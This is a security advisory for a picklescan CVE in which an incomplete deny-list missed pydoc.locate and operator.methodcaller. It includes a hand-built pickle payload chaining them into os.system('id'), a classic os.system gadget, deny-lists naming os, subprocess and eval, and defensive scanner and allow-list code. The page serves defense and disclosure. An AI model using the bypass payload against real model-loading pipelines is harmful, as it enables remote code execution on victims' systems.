picklescan
CVE-2025-71320
CRITICAL
Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Network-delivered malicious pickle, no auth; the vector scores UI:N even though the victim's pipeline has to deserialize the file for the gadget to fire; full RCE yields C/I/A High with no subsequent-system impact (SC/SI/SA:N).
Primary rating from Vendor (VulnCheck).
Description (CVE.org)
picklescan before 0.0.33 contains an incomplete deny-list that fails to block pydoc.locate and operator.methodcaller functions, allowing attackers to bypass security checks. Remote attackers can craft malicious pickle files using these unblocked functions to achieve arbitrary code execution when the pickle is deserialized.
Analysis (AI)
Arbitrary code execution in picklescan before 0.0.33: remote attackers bypass the scanner's malicious-pickle detection using pydoc.locate and operator.methodcaller, neither of which was on the deny-list. Any downstream tool that trusts a 'clean' picklescan verdict and then deserializes the pickle (e.g., ML model loaders) executes attacker-supplied code. A public proof of concept is included in the GHSA advisory; the CVSS 4.0 base score is 9.3 (Critical); the CVE was not in the CISA KEV catalog at the time of analysis, i.e. no in-the-wild exploitation had been recorded there.
Technical Context (AI)
picklescan is a Python package (cpe:2.3:a:picklescan:picklescan) widely used in the ML ecosystem, notably by Hugging Face, to statically inspect pickle files for dangerous opcodes and imports before they are unpickled into model weights. It relies on an explicit deny-list of module.function pairs treated as dangerous. CWE-184 (Incomplete List of Disallowed Inputs) applies directly: the list enumerated only some pydoc and operator functions, so pydoc.locate (which resolves a dotted path such as 'os' or 'os.system' to the live module or attribute, importing as needed) and operator.methodcaller (which returns a callable that invokes a named method on its argument, e.g. 'system') passed through unflagged. Chained together via REDUCE opcodes (a __reduce__ return value on the attacker's side), they reproduce the classic os.system gadget without the string 'os' ever appearing as an imported global, which is what the scanner keyed on.
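The deny-list gap described above, as an added example that is neither picklescan's code nor the advisory's PoC: a toy static scanner over pickletools.genops, a hand-built protocol-2 pickle that chains pydoc.locate and operator.methodcaller, and an incomplete deny-list beside the wildcard form the fix uses. The specific pre-0.0.33 entries shown are assumed for illustration; only the absence of 'locate' and 'methodcaller' matters. The payload is only disassembled, never loaded.

```python
import pickle
import pickletools
import pydoc
import operator

# Constructed payload (not the advisory PoC): a hand-written protocol-2 pickle
# that chains pydoc.locate('os') into operator.methodcaller('system', 'id') so
# that os.system('id') would run without 'os' ever appearing as a GLOBAL opcode.
# It is only disassembled here, never passed to pickle.loads.
BYPASS_PAYLOAD = (
    b"\x80\x02"                      # PROTO 2
    b"coperator\nmethodcaller\n"     # GLOBAL     operator.methodcaller
    b"X\x06\x00\x00\x00system"       # BINUNICODE 'system'
    b"X\x02\x00\x00\x00id"           # BINUNICODE 'id'
    b"\x86"                          # TUPLE2     ('system', 'id')
    b"R"                             # REDUCE  -> methodcaller('system', 'id')
    b"cpydoc\nlocate\n"              # GLOBAL     pydoc.locate
    b"X\x02\x00\x00\x00os"           # BINUNICODE 'os'
    b"\x85"                          # TUPLE1     ('os',)
    b"R"                             # REDUCE  -> locate('os') == <module 'os'>
    b"\x85"                          # TUPLE1     (<module 'os'>,)
    b"R"                             # REDUCE  -> methodcaller(os) == os.system('id')
    b"."                             # STOP
)

# The classic gadget for comparison: names os.system directly.
CLASSIC_PAYLOAD = b"\x80\x02cos\nsystem\nX\x02\x00\x00\x00id\x85R."

# Protocol-4 pickles spell globals as STACK_GLOBAL instead; this one merely
# references pydoc.locate (loading it returns the function, nothing runs).
STACK_GLOBAL_PAYLOAD = pickle.dumps(pydoc.locate, protocol=4)

# Deny-lists in the shape the page describes: module -> set of names, or "*"
# for the whole module. The pre-0.0.33 entries are assumed for illustration,
# not copied from picklescan; the point is that 'locate' and 'methodcaller'
# are absent.
INCOMPLETE_DENYLIST = {
    "os": "*",
    "subprocess": "*",
    "builtins": {"eval", "exec", "compile", "__import__"},
    "pydoc": {"pipepager"},        # assumed partial list, no 'locate'
    "operator": {"attrgetter"},    # assumed partial list, no 'methodcaller'
}
# The fix: wildcard both modules so any pydoc.* / operator.* reference is flagged.
FIXED_DENYLIST = {**INCOMPLETE_DENYLIST, "pydoc": "*", "operator": "*"}

STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def extract_globals(data: bytes) -> list[tuple[str, str]]:
    """List (module, name) pairs a pickle imports, via GLOBAL or STACK_GLOBAL,
    using pickletools.genops so nothing is executed."""
    found = []
    recent = []  # last two string constants: the operands of STACK_GLOBAL
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)   # genops joins the pair with a space
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            if len(recent) < 2:
                raise ValueError("STACK_GLOBAL without two preceding strings")
            found.append((recent[-2], recent[-1]))
        elif op.name in STRING_OPS:
            text = arg.decode("latin-1") if isinstance(arg, bytes) else arg
            recent = (recent + [text])[-2:]
    return found


def scan(data: bytes, denylist: dict) -> list[str]:
    """Return the 'module.name' references the deny-list marks dangerous."""
    flagged = []
    for module, name in extract_globals(data):
        rule = denylist.get(module)
        if rule == "*" or (isinstance(rule, set) and name in rule):
            flagged.append(f"{module}.{name}")
    return flagged


if __name__ == "__main__":
    for label, payload in [("bypass", BYPASS_PAYLOAD), ("classic", CLASSIC_PAYLOAD),
                           ("stack_global", STACK_GLOBAL_PAYLOAD)]:
        print(label, "old:", scan(payload, INCOMPLETE_DENYLIST),
              "fixed:", scan(payload, FIXED_DENYLIST))
    # What the two stages resolve to in a real unpickler (final call not made):
    stage1 = pydoc.locate("os")                      # <module 'os'>
    stage2 = operator.methodcaller("system", "id")   # stage2(stage1) would run `id`
    print(stage1.__name__, stage2)
```

The bypass payload produces no hit against the incomplete list and two hits against the wildcard list, while the classic gadget is caught by both; the protocol-4 case shows why a scanner has to track STACK_GLOBAL operands as well as GLOBAL.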
Remediation (AI)
Vendor-released patch: upgrade picklescan to 0.0.33 or later (pip install -U 'picklescan>=0.0.33'), which extends the deny-list for the pydoc and operator modules to a wildcard so any use of those modules is flagged as dangerous; the fix is tracked in PR https://github.com/mmaitre314/picklescan/pull/53 and commit 70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab, with full details in advisory https://github.com/mmaitre314/picklescan/security/advisories/GHSA-84r2-jw7c-4r5q. Note that the related entries listed below cover further bypasses in versions prior to 1.0.1 and 1.0.4, so pin the current release rather than 0.0.33 exactly. If an immediate upgrade is not possible, treat picklescan 'safe' verdicts as untrusted for pickle files from external sources and refuse to deserialize raw pickles at all; prefer safetensors or another non-executable model format, which removes the pickle attack surface entirely at the cost of converting artifacts. As a narrower stopgap, sandbox unpickling in a no-network, read-only container (this limits blast radius but does not prevent code execution inside the container), or extend a local fork's deny-list to treat pydoc.* and operator.* as dangerous (this matches the upstream fix but must be maintained by hand).
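The "refuse to deserialize raw pickles" advice above, as an added example that is not picklescan's code nor that of any model loader: an allow-list Unpickler that fails closed on every global it has not been told about, so pydoc.locate and operator.methodcaller are rejected at find_class time, before any REDUCE can invoke them, regardless of what a scanner reported. The allow-list contents and the two probe classes are hypothetical; the probes are built so that even a plain pickle.loads would only return a function or callable object, never run it.

```python
import io
import pickle
import pydoc
import operator
from collections import OrderedDict

# Globals a loader genuinely needs. Hypothetical for this example; a real
# loader enumerates the handful of types its own artifacts contain.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}


class AllowListUnpickler(pickle.Unpickler):
    """Fail closed: an unlisted global aborts the load before REDUCE can run it."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} not on allow-list")


def safe_loads(data: bytes):
    """Deserialize with the allow-list in force; raises UnpicklingError otherwise."""
    return AllowListUnpickler(io.BytesIO(data)).load()


def load_verdict(data: bytes) -> str:
    """Human-readable outcome of an allow-listed load, for logging or tests."""
    try:
        safe_loads(data)
        return "loaded"
    except pickle.UnpicklingError as exc:
        return f"refused: {exc}"


# Constructed probes referencing exactly the two globals the fixed deny-list
# now wildcards. Loading them with the stock Unpickler would only yield
# os.system / a methodcaller object; nothing is invoked.
class LocateProbe:
    def __reduce__(self):
        return (pydoc.locate, ("os.system",))             # loads -> os.system, not called


class MethodcallerProbe:
    def __reduce__(self):
        return (operator.methodcaller, ("system", "id"))  # loads -> callable, not called


BENIGN_PAYLOAD = pickle.dumps(OrderedDict(weights=[0.1, 0.2]))   # references collections.OrderedDict
LOCATE_PAYLOAD = pickle.dumps(LocateProbe())                     # references pydoc.locate
METHODCALLER_PAYLOAD = pickle.dumps(MethodcallerProbe())         # references operator.methodcaller

if __name__ == "__main__":
    for label, payload in [("benign", BENIGN_PAYLOAD), ("pydoc.locate", LOCATE_PAYLOAD),
                           ("operator.methodcaller", METHODCALLER_PAYLOAD)]:
        print(f"{label}: {load_verdict(payload)}")
```

An allow-list moves the decision from "is this import known-bad?" to "is this import known-needed?", which is why it does not share the CWE-184 failure mode of a deny-list; it still executes whatever the allowed types' constructors do, so keep the list to plain data containers and prefer a non-executable format where the pipeline permits.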
More from same product – last 7 days
Remote code execution against users of picklescan versions prior to 1.0.4 is achievable by smuggling any blocked functio
Arbitrary code execution in picklescan versions prior to 1.0.1 allows attackers to bypass the scanner's malicious pickle
Arbitrary file write in picklescan before 0.0.33 lets attackers bypass the tool's dangerous-call blocklist by abusing di
Remote code execution in picklescan before 0.0.33 enables attackers to bypass the tool's malicious-pickle detection by s
Detection bypass in picklescan versions prior to 0.0.27 allows attackers to smuggle malicious Python pickle files past t